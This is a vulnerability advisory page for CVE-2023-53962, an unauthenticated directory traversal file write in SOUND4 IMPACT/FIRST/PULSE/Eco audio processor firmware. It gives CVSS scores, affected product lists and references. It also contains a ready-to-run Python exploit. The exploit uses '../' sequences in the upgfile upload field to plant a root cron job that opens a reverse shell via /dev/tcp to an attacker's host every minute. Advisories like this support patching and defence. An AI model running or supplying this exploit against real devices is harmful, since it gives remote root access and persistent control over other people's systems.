CVE-2023-53962

Description

SOUND4 IMPACT/FIRST/PULSE/Eco v2.x contains an unauthenticated directory traversal vulnerability that allows remote attackers to write arbitrary files through the 'upgfile' parameter in upload.cgi. Attackers can exploit the vulnerability by sending crafted multipart form-data POST requests with directory traversal sequences to write files to unintended system locations.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:o:sound4:impact_firmware:2.15:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:sound4:impact:2.0:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:sound4:impact_firmware:1.69:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:sound4:impact:1.0:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:sound4:pulse_firmware:2.15:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:sound4:pulse:2.0:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:sound4:pulse_firmware:1.69:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:sound4:pulse:1.0:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:sound4:first_firmware:2.15:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:sound4:first:2.0:*:*:*:*:*:*:* - NOT VULNERABLE

SOUND4 IMPACT v2.x < 修复版本

SOUND4 FIRST v2.x < 修复版本

SOUND4 PULSE v2.x < 修复版本

SOUND4 Eco v2.x < 修复版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

def exploit_cve_2023_53962(target_url, lhost, lport):
    """
    CVE-2023-53962 PoC - SOUND4 IMPACT/FIRST/PULSE/Eco Unauthenticated Directory Traversal
    This PoC demonstrates writing a cron job to achieve RCE
    """
    # Target endpoint
    upload_url = f"{target_url}/upload.cgi"
    
    # Payload: Write a cron job for reverse shell
    # Target path: /etc/cron.d/ for persistence
    payload_filename = "../../../../../../etc/cron.d/pwned"
    
    # Cron job payload - reverse shell every minute
    payload_content = f"* * * * * root /bin/bash -c 'bash -i >& /dev/tcp/{lhost}/{lport} 0>&1'\n"
    
    # Boundary for multipart form-data
    boundary = "----WebKitFormBoundary"
    
    # Construct multipart request body
    body = f"""--{boundary}\r
Content-Disposition: form-data; name="upgfile"; filename="{payload_filename}"\r
Content-Type: application/octet-stream\r
\r
{payload_content}

--{boundary}--\r
"""
    
    headers = {
        'Content-Type': f'multipart/form-data; boundary={boundary}',
        'Accept': '*/*'
    }
    
    print(f"[*] Target: {target_url}")
    print(f"[*] Uploading payload to: {payload_filename}")
    
    try:
        response = requests.post(upload_url, data=body, headers=headers, timeout=10)
        print(f"[+] Response Status: {response.status_code}")
        if response.status_code == 200:
            print("[+] Payload uploaded successfully!")
            print(f"[*] Check listener on {lhost}:{lport}")
        else:
            print(f"[-] Upload failed with status: {response.status_code}")
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    if len(sys.argv) < 4:
        print(f"Usage: python {sys.argv[0]} <target_url> <lhost> <lport>")
        print(f"Example: python {sys.argv[0]} http://192.168.1.100 192.168.1.50 4444")
        sys.exit(1)
    
    exploit_cve_2023_53962(sys.argv[1], sys.argv[2], sys.argv[3])

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2023-53962
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2023-53962
[3] CVE Details https://www.cvedetails.com/cve/CVE-2023-53962/
[4] VulDB https://vuldb.com/cve/CVE-2023-53962
[5] https://web.archive.org/web/20221207074555/https://www.sound4.com/
[6] https://www.exploit-db.com/exploits/51172
[7] https://www.vulncheck.com/advisories/sound-impactfirstpulseeco-x-unauthenticated-directory-traversal-file-write
[8] https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5730.php
[9] https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5730.php

Raw JSON Data

JSON

{"cve": {"id": "CVE-2023-53962", "sourceIdentifier": "[email protected]", "published": "2025-12-22T22:16:00.530", "lastModified": "2026-01-16T19:16:13.767", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "SOUND4 IMPACT/FIRST/PULSE/Eco v2.x contains an unauthenticated directory traversal vulnerability that allows remote attackers to write arbitrary files through the 'upgfile' parameter in upload.cgi. Attackers can exploit the vulnerability by sending crafted multipart form-data POST requests with directory traversal sequences to write files to unintended system locations."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, {"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:sound4:impact_firmware:2.15:*:*:*:*:*:*:*", "matchCriteriaId": "33C347FE-DA7B-4137-87B8-E6A8AF4D307F"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:sound4:impact:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "0A735654-A166-4B56-BF4D-F165B7E11043"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:sound4:impact_firmware:1.69:*:*:*:*:*:*:*", "matchCriteriaId": "5C4CF02A-8CF1-46FF-9EC0-FF779D60B6EA"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:sound4:impact:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "EC9BD81B-573A-4DA7-AC47-6C8AF1B6B18F"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:sound4:pulse_firmware:2.15:*:*:*:*:*:*:*", "matchCriteriaId": "18E34118-F11B-4BF2-BE23-7DAE0A6790FB"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:sound4:pulse:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "C46BF88C-955C-4F9E-B782-1EADA068F19D"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:sound4:pulse_firmware:1.69:*:*:*:*:*:*:*", "matchCriteriaId": "E0699DEA-9CDA-4BB4-8FA3-6A6FADE1A61E"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:sound4:pulse:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "051868AE-E364-4CB3-B927-42B4E0C19D01"}]}]}, {"operator": "AND", "nodes": [{"operator": " ... (truncated)